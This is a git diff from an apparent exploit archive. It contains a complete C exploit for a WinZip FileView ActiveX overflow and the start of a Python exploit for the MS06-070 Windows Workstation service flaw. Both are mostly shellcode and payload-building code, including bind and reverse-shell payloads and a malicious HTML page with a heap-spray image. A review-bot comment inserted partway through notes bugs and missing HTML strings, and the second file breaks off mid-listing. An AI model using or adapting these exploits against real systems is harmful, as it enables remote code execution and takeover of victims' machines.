- "\x43\x38\x4d\x4f\xad\xb4\x4d\x74\x35\x09\xbe\x4f\x18\xf2\x5b\xe0"
- "\xeb\x17\xfd\x4d\xac\xb9\x7e\xd8\x6c\x80\x8f\x8a\x92\x01\x7c\xd8"
- "\x6a\xbb\x7e\xd8\x6c\x80\xce\x6e\x3a\xa1\x7c\xd8\x6a\xb8\x7f\x73"
- "\xe9\x17\xfb\xb4\xd4\x0f\x52\xe1\xc5\xbf\xd4\xf1\xe9\x17\xfb\x41"
- "\xd6\x8c\x4d\x4f\xdf\x85\xa2\xc2\xd6\xb8\x72\x0e\x70\x61\xcc\x4d"
- "\xf8\x61\xc9\x16\x7c\x1b\x81\xd9\xfe\xc5\xd5\x65\x90\x7b\xa6\x5d"
- "\x84\x43\x80\x8c\xd4\x9a\xd5\x94\xaa\x17\x5e\x63\x43\x3e\x70\x70"
- "\xee\xb9\x7a\x76\xd6\xe9\x7a\x76\xe9\xb9\xd4\xf7\xd4\x45\xf2\x22"
- "\x72\xbb\xd4\xf1\xd6\x17\xd4\x10\x43\x38\xa0\x70\x40\x6b\xef\x43"
- "\x43\x3e\x79\xd8\x6c\x80\x55\xff\x5e\x9b\x78\xd8\x6a\x17\xfb\x27"},
- {"Win32 x86 connect() shellcode (4444/tcp default)",167,160,
- "\xfc\x6a\xeb\x4d\xe8\xf9\x ff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
- "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
- "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
- "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
- "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
- "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
- "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
- "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
- "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
- "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68"
- "\x01\x02\x03\x04\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xec\xf9"
- "\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68"
- "\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3"
- "\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab"
- "\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51"
- "\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6"
- "\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6"
- "\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"}
-};
-
-char html1[]="\r\n\r\n\r\n\r\n"
- "\r\n\r\n\r\n\r\n\r"
- "\n\r\n\r\n";
-
-
-char bmphdr[]="\x42\x4d\x3e\xbb\x2d\x00\x00\x00\x00\x00\x36\x00\x00"
- "\x00\x28\x00\x00\x00\xe7\x03\x00\x00\xe7\x03\x00\x00"
- "\x01\x00\x18\x00\x00\x00\x00\x00\x08\xbb\x2d\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00";
-int ret;
-
-void help(char* progname){
- int count;
- printf("[ Usage instructions.\n[\n");
- printf("[ %s (optional)\n[\n[ --filename|-f \n",progname);
- printf("[ --imgname|-i \n[ --shellcode|-s \n");
- printf("[ --shellport|-p (port)\n");
- printf("[ --shellhost|-i (ip)\n");
- printf("[ --target|-t \n[\n");
- printf("[ Target#'s\n");
- for(count = 0;count <= targetno - 1;count++){
- printf("[ %d %s 0x%x\n",count,targets[count],targets[count]);
- }
- printf("[\n[ Shellcode#'s\n");
- for(count = 0;count <= shellno - 1;count++){
- printf("[ %d \"%s\" (length %d bytes)\n",count,shellcodes[count].name,strlen(shellcodes[count].shellcode));
- }
- exit(0);
-}
-
-void setret(char* retarg){
- int value = atoi(retarg);
- switch(value){
- case 0:
- printf("[ Using target '%s'\n",targets[ret].name);
- ret = targets[ret].retaddr;
- break;
- default:
- ret = strtoul(retarg,NULL,16);
- printf("[ Using return address '0x%x'\n",ret);
- break;
- }
-}
-
-int main(int argc, char* argv[]){
- unsigned long i, fd;
- int c, index, payg, paya, lhost;
- short shellport, shellport2;
- int ishell = 0, itarg = 0;
- char *buffer, *file, *img, *payload;
- static struct option options[] = {
- {"filename", 1, 0, 'f'},
- {"imgname", 1, 0, 'i'},
- {"target", 1, 0, 't'},
- {"shellcode", 1, 0, 's'},
- {"shellport", 1, 0, 'p'},
- {"shellhost", 1, 0, 'd'},
- {"help", 0, 0,'h'}
- };
- printf("[ WinZip <= 10.0.7245 FileView ActiveX overflow exploit\n");
- while(c != -1){
- c = getopt_long(argc,argv,"f:i:t:s:p:d:h",options,&index);
- switch(c){
- case 'f':
- file = optarg;
- break;
- case 'i':
- img = optarg;
- break;
- case 't':
- itarg = 1;
- setret(optarg);
- if(strlen((char*)&ret) < 4){
- fprintf(stderr,"[ Selected target contains a null address!\n");
- exit(-1);
- }
- break;
- case 's':
- if(ishell==0){
- payg = atoi(optarg);
- switch(payg){
- case 0:
- printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));
- payload = malloc(strlen(shellcodes[payg].shellcode)+1);
- memset(payload,0,strlen(shellcodes[payg].shellcode)+1);
- memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));
- shellport2 = 4444;
- ishell = 1;
- break;
- case 1:
- printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));
- payload = malloc(strlen(shellcodes[payg].shellcode)+1);
- memset(payload,0,strlen(shellcodes[payg].shellcode)+1);
- memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));
- shellport2 = 4444;
- ishell = 1;
- break;
- default:
- printf("[ Invalid shellcode selection %d\n",payg);
- exit(0);
- break;
- }
- }
- break;
- case 'p':
- if(ishell==1){
- if(shellcodes[payg].port > -1){
- paya = strlen(payload);
- shellport = atoi(optarg);
- shellport2 = shellport;
- shellport =(shellport&0xff)<<8 | shellport>>8;
- memcpy((void*)&payload[shellcodes[payg].port],&shellport,sizeof(shellport));
- if(paya > strlen(payload)) {
- printf("[ Error shellcode port introduces null bytes\n");
- exit(1);
- }
- printf("[ Shellcode port changed to '%u'\n",atoi(optarg));
- }
- else{
- printf("[ (%s) port selection is ignored for current shellcode\n",optarg);
- }
- }
- else{
- printf("[ No shellcode selected yet, ignoring (%s) port selection\n",optarg);
- }
- break;
- case 'd':
- if(ishell==1){
- if(shellcodes[payg].host > -1){
- paya = strlen(payload);
- lhost = inet_addr(optarg);
- memcpy((void*)&payload[shellcodes[payg].host],&lhost,sizeof(lhost));
- if(paya > strlen(payload)){
- printf("[ Error shellhost introduces null bytes\n");
- exit(1);
- }
- printf("[ Shellhost has been changed to '%s'\n",optarg);
- }
- else{
- printf("[ (%s) shellhost selection is ignored for current shellcode\n",optarg);
- }
- }
- else {
- printf("[ No shellcode selected yet, ignoring (%s) shellhost selection\n",optarg);
- }
- break;
- case 'h':
- help(argv[0]);
- break;
- default:
- break;
- }
- }
- if(ishell==0||itarg==0||strlen(file)==0||strlen(img)==0){
- printf("[ Error insufficient arguements, try running '%s --help'\n",argv[0]);
- exit(0);
- }
-
-// create image
- printf("[ Creating image containing shellcode '%s'\n",img);
- fd = open(img,O_RDWR|O_CREAT,S_IRWXU);
- if(fd == -1){
- fprintf(stderr,"[ Error creating %s\n",file);
- exit(-1);
- }
- write(fd,bmphdr,sizeof(bmphdr));
- for(i = 0;i < NOPSIZE;i++){
- write(fd,"\x90",1);
- }
- write(fd,payload,strlen(payload));
- close(fd);
-
-// create html
- printf("[ Creating html exploit page '%s'\n",file);
- fd = open(file,O_RDWR|O_CREAT,S_IRWXU);
- if(fd == -1){
- fprintf(stderr,"[ Error creating %s\n",file);
- exit(-1);
- }
- write(fd,html1,strlen(html1));
- for(i = 0;i < 265;i++){
- write(fd,"A",1);
- }
- write(fd,&ret,4);
- for(i = 0;i < 1827;i++){
- write(fd,"A",1);
- }
- write(fd,html2,strlen(html2));
- write(fd,img,strlen(img));
- write(fd,html3,strlen(html3));
- close(fd);
-}
-
-// milw0rm.com [2006-11-15]
+/* WinZip <= 10.0.7245 FileView ActiveX buffer overflow exploit
+ * ============================================================
+ * A vulnerability has been identified within Winzip that allows remote
+ * attackers to execute arbitrary code. User interaction is required to
+ * exploit this vulnerability in that the target must visit a malicious
+ * web page. The flaw exists within "FileView" ActiveX control which
+ * contains stack based overflow conditions. This exploit generates a
+ * malicious html page and contains shellcode embedded within an image
+ * file. Due to the random nature of the heap, this exploit uses hard
+ * coded location of the image bytes within the heap and as such is
+ * unreliable in exploitation of this bug, but has approximately 1 in
+ * 6 hit ratio within the tested environment.
+ *
+ * Example.
+ * $ ./prdelka-vs-MS-winzip -f index.html -i foo.bmp -s 0 -t 0
+ * [ WinZip <= 10.0.7245 FileView ActiveX overflow exploit
+ * [ Using shellcode 'Win32 x86 bind() shellcode (4444/tcp default)' (400 bytes)
+ * [ Using target 'WinXP SP2(en) WinZIP 10.0.6667'
+ * [ Creating image containing shellcode 'foo.bmp'
+ * [ Creating html exploit page 'index.html'
+ * $
+ * ... clicky clicky MSIE ...
+ * $ telnet 192.168.1.223 4444
+ * Connected to 192.168.1.223.
+ * Escape character is '^]'.
+ *
+ * Microsoft Windows XP [Version 5.1.2600]
+ * (C) Copyright 1985-2001 Microsoft Corp.
+ *
+ * C:\Documents and Settings\User\Desktop>
+ *
+ * - prdelka
+ */
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define NOPSIZE 999999
+
+struct target {
+ char* name;
+ int retaddr;
+};
+
+struct shellcode {
+ char* name;
+ short port;
+ int host;
+ char* shellcode;
+};
+
+int targetno = 1;
+
+struct target targets[] = {
+ {"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269}
+ /* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */
+};
+
+int shellno = 2;
+
+struct shellcode shellcodes[] = {
+ {"Win32 x86 bind() shellcode (4444/tcp default)",162,-1,
+ "\x48\x40\xf5\x49\xd6\x4a\xf9\x91\x47\x96\x2f\xf8\x9b\x37\x41\xf5"
+ "\x99\x47\xf9\xf9\xfc\xf9\x48\x4e\x4b\x9b\x90\x9b\xf5\x97\x40\xf9"
+ "\xd6\x41\xf9\x48\x9b\x92\xfd\x9b\x49\x42\x4f\x9f\x90\xd6\x27\x9b"
+ "\x93\x46\x2f\x90\xfd\x4a\x6a\x51\x59\xd9\xee\xd9\x74\x24\xf4\x5b"
+ "\x81\x73\x13\xbc\xe8\x2b\x27\x83\xeb\xfc\xe2\xf4\x3d\x2c\x7f\xd5"
+ "\x43\x17\xd7\x4d\x57\xa5\xc3\xde\x43\x17\xd4\x47\x37\x84\x0f\x03"
+ "\x37\xad\x17\xac\xc0\xed\x53\x26\x53\x63\x64\x3f\x37\xb7\x0b\x26"
+ "\x57\xa1\xa0\x13\x37\xe9\xc5\x16\x7c\x71\x87\xa3\x7c\x9c\x2c\xe6"
+ "\x76\xe5\x2a\xe5\x57\x1c\x10\x73\x98\xc0\x5e\xc2\x37\xb7\x0f\x26"
+ "\x57\x8e\xa0\x2b\xf7\x63\x74\x3b\xbd\x03\x28\x0b\x37\x61\x47\x03"
+ "\xa0\x89\xe8\x16\x67\x8c\xa0\x64\x8c\x63\x6b\x2b\x37\x98\x37\x8a"
+ "\x37\xa8\x23\x79\xd4\x66\x65\x29\x50\xb8\xd4\xf1\xda\xbb\x4d\x4f"
+ "\x8f\xda\x43\x50\xcf\xda\x74\x73\x43\x38\x43\xec\x51\x14\x10\x77"
+ "\x43\x3e\x74\xae\x59\x8e\xaa\xca\xb4\xea\x7e\x4d\xbe\x17\xfb\x4f"
+ "\x65\xe1\xde\x8a\xeb\x17\xfd\x74\xef\xbb\x78\x74\xff\xbb\x68\x74"
+ "\x43\x38\x4d\x4f\xad\xb4\x4d\x74\x35\x09\xbe\x4f\x18\xf2\x5b\xe0"
+ "\xeb\x17\xfd\x4d\xac\xb9\x7e\xd8\x6c\x80\x8f\x8a\x92\x01\x7c\xd8"
+ "\x6a\xbb\x7e\xd8\x6c\x80\xce\x6e\x3a\xa1\x7c\xd8\x6a\xb8\x7f\x73"
+ "\xe9\x17\xfb\xb4\xd4\x0f\x52\xe1\xc5\xbf\xd4\xf1\xe9\x17\xfb\x41"
+ "\xd6\x8c\x4d\x4f\xdf\x85\xa2\xc2\xd6\xb8\x72\x0e\x70\x61\xcc\x4d"
+ "\xf8\x61\xc9\x16\x7c\x1b\x81\xd9\xfe\xc5\xd5\x65\x90\x7b\xa6\x5d"
+ "\x84\x43\x80\x8c\xd4\x9a\xd5\x94\xaa\x17\x5e\x63\x43\x3e\x70\x70"
+ "\xee\xb9\x7a\x76\xd6\xe9\x7a\x76\xe9\xb9\xd4\xf7\xd4\x45\xf2\x22"
+ "\x72\xbb\xd4\xf1\xd6\x17\xd4\x10\x43\x38\xa0\x70\x40\x6b\xef\x43"
+ "\x43\x3e\x79\xd8\x6c\x80\x55\xff\x5e\x9b\x78\xd8\x6a\x17\xfb\x27"},
+ {"Win32 x86 connect() shellcode (4444/tcp default)",167,160,
+ "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
+ "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
+ "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
+ "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
+ "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
+ "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
+ "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
+ "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
+ "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
+ "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68"
+ "\x01\x02\x03\x04\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xec\xf9"
+ "\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68"
+ "\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3"
+ "\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab"
+ "\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51"
+ "\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6"
+ "\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6"
+ "\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"}
+};
+
+char html1[]="\r\n\r\n\r\n\r\n"
+ "\r\n\r\n\r\n\r\n\r"
+ "\n\r\n\r\n";
+
+
+char bmphdr[]="\x42\x4d\x3e\xbb\x2d\x00\x00\x00\x00\x00\x36\x00\x00"
+ "\x00\x28\x00\x00\x00\xe7\x03\x00\x00\xe7\x03\x00\x00"
+ "\x01\x00\x18\x00\x00\x00\x00\x00\x08\xbb\x2d\x00\x00"
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+ "\x00\x00";
+int ret;
+
+void help(char* progname){
+ int count;
+ printf("[ Usage instructions.\n[\n");
+ printf("[ %s (optional)\n[\n[ --filename|-f \n",progname);
+ printf("[ --imgname|-i \n[ --shellcode|-s \n");
+ printf("[ --shellport|-p (port)\n");
+ printf("[ --shellhost|-i (ip)\n");
+ printf("[ --target|-t \n[\n");
+ printf("[ Target#'s\n");
+ for(count = 0;count <= targetno - 1;count++){
+ printf("[ %d %s 0x%x\n",count,targets[count],targets[count]);
+ }
+ printf("[\n[ Shellcode#'s\n");
+ for(count = 0;count <= shellno - 1;count++){
+ printf("[ %d \"%s\" (length %d bytes)\n",count,shellcodes[count].name,strlen(shellcodes[count].shellcode));
+ }
+ exit(0);
+}
+
+void setret(char* retarg){
+ int value = atoi(retarg);
+ switch(value){
+ case 0:
+ printf("[ Using target '%s'\n",targets[ret].name);
+ ret = targets[ret].retaddr;
+ break;
+ default:
+ ret = strtoul(retarg,NULL,16);
+ printf("[ Using return address '0x%x'\n",ret);
+ break;
+ }
+}
+
+int main(int argc, char* argv[]){
+ unsigned long i, fd;
+ int c, index, payg, paya, lhost;
+ short shellport, shellport2;
+ int ishell = 0, itarg = 0;
+ char *buffer, *file, *img, *payload;
+ static struct option options[] = {
+ {"filename", 1, 0, 'f'},
+ {"imgname", 1, 0, 'i'},
+ {"target", 1, 0, 't'},
+ {"shellcode", 1, 0, 's'},
+ {"shellport", 1, 0, 'p'},
+ {"shellhost", 1, 0, 'd'},
+ {"help", 0, 0,'h'}
+ };
+ printf("[ WinZip <= 10.0.7245 FileView ActiveX overflow exploit\n");
+ while(c != -1){
+ c = getopt_long(argc,argv,"f:i:t:s:p:d:h",options,&index);
+ switch(c){
+ case 'f':
+ file = optarg;
+ break;
+ case 'i':
+ img = optarg;
+ break;
+ case 't':
+ itarg = 1;
+ setret(optarg);
+ if(strlen((char*)&ret) < 4){
+ fprintf(stderr,"[ Selected target contains a null address!\n");
+ exit(-1);
+ }
+ break;
+ case 's':
+ if(ishell==0){
+ payg = atoi(optarg);
+ switch(payg){
+ case 0:
+ printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));
+ payload = malloc(strlen(shellcodes[payg].shellcode)+1);
+ memset(payload,0,strlen(shellcodes[payg].shellcode)+1);
+ memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));
+ shellport2 = 4444;
+ ishell = 1;
+ break;
+ case 1:
+ printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));
+ payload = malloc(strlen(shellcodes[payg].shellcode)+1);
+ memset(payload,0,strlen(shellcodes[payg].shellcode)+1);
+ memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));
+ shellport2 = 4444;
+ ishell = 1;
+ break;
+ default:
+ printf("[ Invalid shellcode selection %d\n",payg);
+ exit(0);
+ break;
+ }
+ }
+ break;
+ case 'p':
+ if(ishell==1){
+ if(shellcodes[payg].port > -1){
+ paya = strlen(payload);
+ shellport = atoi(optarg);
+ shellport2 = shellport;
+ shellport =(shellport&0xff)<<8 | shellport>>8;
+ memcpy((void*)&payload[shellcodes[payg].port],&shellport,sizeof(shellport));
+ if(paya > strlen(payload)) {
+ printf("[ Error shellcode port introduces null bytes\n");
+ exit(1);
+ }
+ printf("[ Shellcode port changed to '%u'\n",atoi(optarg));
+ }
+ else{
+ printf("[ (%s) port selection is ignored for current shellcode\n",optarg);
+ }
+ }
+ else{
+ printf("[ No shellcode selected yet, ignoring (%s) port selection\n",optarg);
+ }
+ break;
+ case 'd':
+ if(ishell==1){
+ if(shellcodes[payg].host > -1){
+ paya = strlen(payload);
+ lhost = inet_addr(optarg);
+ memcpy((void*)&payload[shellcodes[payg].host],&lhost,sizeof(lhost));
+ if(paya > strlen(payload)){
+ printf("[ Error shellhost introduces null bytes\n");
+ exit(1);
+ }
+ printf("[ Shellhost has been changed to '%s'\n",optarg);
+ }
+ else{
+ printf("[ (%s) shellhost selection is ignored for current shellcode\n",optarg);
+ }
+ }
+ else {
+ printf("[ No shellcode selected yet, ignoring (%s) shellhost selection\n",optarg);
+ }
+ break;
+ case 'h':
+ help(argv[0]);
+ break;
+ default:
+ break;
+ }
+ }
+ if(ishell==0||itarg==0||strlen(file)==0||strlen(img)==0){
+ printf("[ Error insufficient arguements, try running '%s --help'\n",argv[0]);
+ exit(0);
+ }
+
+// create image
+ printf("[ Creating image containing shellcode '%s'\n",img);
+ fd = open(img,O_RDWR|O_CREAT,S_IRWXU);
+ if(fd == -1){
+ fprintf(stderr,"[ Error creating %s\n",file);
+ exit(-1);
+ }
+ write(fd,bmphdr,sizeof(bmphdr));
+ for(i = 0;i < NOPSIZE;i++){
+ write(fd,"\x90",1);
+ }
+ write(fd,payload,strlen(payload));
+ close(fd);
+
+// create html
+ printf("[ Creating html exploit page '%s'\n",file);
+ fd = open(file,O_RDWR|O_CREAT,S_IRWXU);
+ if(fd == -1){
+ fprintf(stderr,"[ Error creating %s\n",file);
+ exit(-1);
+ }
+ write(fd,html1,strlen(html1));
+ for(i = 0;i < 265;i++){
+ write(fd,"A",1);
+ }
+ write(fd,&ret,4);
+ for(i = 0;i < 1827;i++){
+ write(fd,"A",1);
+ }
+ write(fd,html2,strlen(html2));
+ write(fd,img,strlen(img));
+ write(fd,html3,strlen(html3));
+ close(fd);
+}
+
+// milw0rm.com [2006-11-15]
diff --git a/platforms/windows/remote/2809.py b/platforms/windows/remote/2809.py
index 434902ba6..e97b4509d 100755
--- a/platforms/windows/remote/2809.py
+++ b/platforms/windows/remote/2809.py
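Review bot: In main(), `c` is tested in `while(c != -1)` before it is ever assigned, and `file`/`img` are handed to `strlen()` in the final argument check even when `-f`/`-i` were never given, so both the option loop and the check run on indeterminate stack values; initialise them (`int c = 0, index = 0, payg = 0, paya = 0, lhost = 0;`, `char *buffer = NULL, *file = NULL, *img = NULL, *payload = NULL;`) and test `file == NULL || img == NULL` instead of calling `strlen()` on them. help() passes whole `struct target` values to `%s` and `0x%x` (it should be `targets[count].name` and `targets[count].retaddr`), and setret() indexes `targets[ret]` with the global return address rather than `targets[value]`, which only works while `ret` is still zero. The final write-out uses `html2` and `html3`, but only `html1` is declared anywhere in this hunk and its content looks like HTML stripped of its tags, so the listing as published probably does not compile as shown; the header comment should say so. The old and new sides of this hunk read identically, so the commit itself appears to be a line-ending normalisation rather than a code change.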
@@ -1,104 +1,104 @@
-#!/usr/bin/python
-# MS06-070 Windows WorkStation NetpManageIPCConnect Vulnerability Exploit
-# Tested on windows 2000 server SP4
-#
-# Usage: python NetAPI-NetrJoinDomain2.py
-# Requires a domain controller on the network (configure samba as DC)
-# Requires python and impacket
-#
-# Winny M Thomas ;-)
-
-
-from impacket.dcerpc import transport
-from impacket import uuid
-import sys
-import socket
-import struct
-
-def DCEconnectAndExploit(target, domain):
- baselen = 3708
-
- stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]"
- stringbinding %= {'host': target,'pipe': 'wkssvc','port': 445,}
-
- print 'Connecting to named pipe (wkssvc)'
- trans = transport.DCERPCTransportFactory(stringbinding)
- trans.connect()
- print 'Setting up DCE transport'
- dce = trans.DCERPC_class(trans)
- dce.bind(uuid.uuidtup_to_bin(('6bffd098-a112-3610-9833-46c3f87e345a','1.0')))
-
- print 'Sending attack payload to target'
- #NetrJoinDomain2 data: Hostname
- query1 = "\xaa\xbb\xcc\xdd"
- query1 += "\x07\x00\x00\x00"
- query1 += "\x00\x00\x00\x00"
- query1 += "\x07\x00\x00\x00"
- query1 += "\x5C\x00\x5C\x00"
- query1 += "\x41\x00\x55\x00"
- query1 += "\x58\x00\x37\x00"
- query1 += "\x00\x00\x00\x00"
-
- #NetrJoinDomain2 data: Domain/Hostname
-
- targetd = '\x00'.join(list(domain)) + '\x00'
- Len = baselen + len(domain)
- query2 = struct.pack('L', Len)
- query2 += struct.pack('L', 0)
- query2 += struct.pack('L', Len)
- query2 += targetd
-
- query3 = "\x5C\x00\x5C\x00\x76\x00\x90\x90"
- query3 += "\x90\x90" * 1058
- query3 += "\xEB\x06" #6 byte jump from current pointer in ebx
- query3 += "\x27\x16\xE1\x77" #Address from user32.dll (0x77E11627)
- #350 byte port binding shellcode
- query3 += "\x90\x90\x90\x90\x90\x90"
- query3 += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
- query3 += "\x13\xe9\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83"
- query3 += "\x01\xa0\xdc\x31\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2"
- query3 += "\x5f\xcb\x91\x58\xcc\x45\xa6\x41\xa8\x91\xc9\x58\xc8\x87"
- query3 += "\x62\x6d\xa8\xcf\x07\x68\xe3\x57\x45\xdd\xe3\xba\xee\x98"
- query3 += "\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6\x9c\xbc\xa8\x91"
- query3 += "\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25\xea\x75"
- query3 += "\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45"
- query3 += "\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57"
- query3 += "\xcf\x9e\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc"
- query3 += "\xb6\x0d\xdc\x1e\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0"
- query3 += "\xc6\xa8\x68\xb4\x2b\xcc\xbc\x33\x21\x31\x39\x31\xfa\xc7"
- query3 += "\x1c\xf4\x74\x31\x3f\x0a\x70\x9d\xba\x0a\x60\x9d\xaa\x0a"
- query3 += "\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f\x7c\x31\x87\xd4"
- query3 += "\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6\x4d\xf4"
- query3 += "\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87"
- query3 += "\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f"
- query3 += "\x5a\x99\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3"
- query3 += "\x60\xbc\x49\x9e\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68"
- query3 += "\xe3\x3d\x43\xa7\x61\xe3\x17\x1b\x0f\x5d\x64\x23\x1b\x65"
- query3 += "\x42\xf2\x4b\xbc\x17\xea\x35\x31\x9c\x1d\xdc\x18\xb2\x0e"
- query3 += "\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f\x16\x89\x4b\x63"
- query3 += "\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e\x62\x0e"
- query3 += "\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91"
- query3 += "\xba\xa6\xf5\x31\x39\x59\x23\xce";
- query3 += "\x90\x90" * 2467
- query3 += "\x00\x00"
-
- query3 += "\x00\x00\x00\x00"
- query3 += "\x00\x00\x00\x00"
- query3 += "\x00\x00\x00\x00"
- query3 += "\x00\x00"
- query3 += "\x01\x00\x00\x00"
-
- query = query1 + query2 + query3
- dce.call(0x16, query)
-
-if __name__ == '__main__':
- try:
- target = sys.argv[1]
- domain = sys.argv[2]
- except IndexError:
- print 'Usage: %s ' % sys.argv[0]
- sys.exit(-1)
-
- DCEconnectAndExploit(target, domain)
-
-# milw0rm.com [2006-11-18]
+#!/usr/bin/python
+# MS06-070 Windows WorkStation NetpManageIPCConnect Vulnerability Exploit
+# Tested on windows 2000 server SP4
+#
+# Usage: python NetAPI-NetrJoinDomain2.py
+# Requires a domain controller on the network (configure samba as DC)
+# Requires python and impacket
+#
+# Winny M Thomas ;-)
+
+
+from impacket.dcerpc import transport
+from impacket import uuid
+import sys
+import socket
+import struct
+
+def DCEconnectAndExploit(target, domain):
+ baselen = 3708
+
+ stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]"
+ stringbinding %= {'host': target,'pipe': 'wkssvc','port': 445,}
+
+ print 'Connecting to named pipe (wkssvc)'
+ trans = transport.DCERPCTransportFactory(stringbinding)
+ trans.connect()
+ print 'Setting up DCE transport'
+ dce = trans.DCERPC_class(trans)
+ dce.bind(uuid.uuidtup_to_bin(('6bffd098-a112-3610-9833-46c3f87e345a','1.0')))
+
+ print 'Sending attack payload to target'
+ #NetrJoinDomain2 data: Hostname
+ query1 = "\xaa\xbb\xcc\xdd"
+ query1 += "\x07\x00\x00\x00"
+ query1 += "\x00\x00\x00\x00"
+ query1 += "\x07\x00\x00\x00"
+ query1 += "\x5C\x00\x5C\x00"
+ query1 += "\x41\x00\x55\x00"
+ query1 += "\x58\x00\x37\x00"
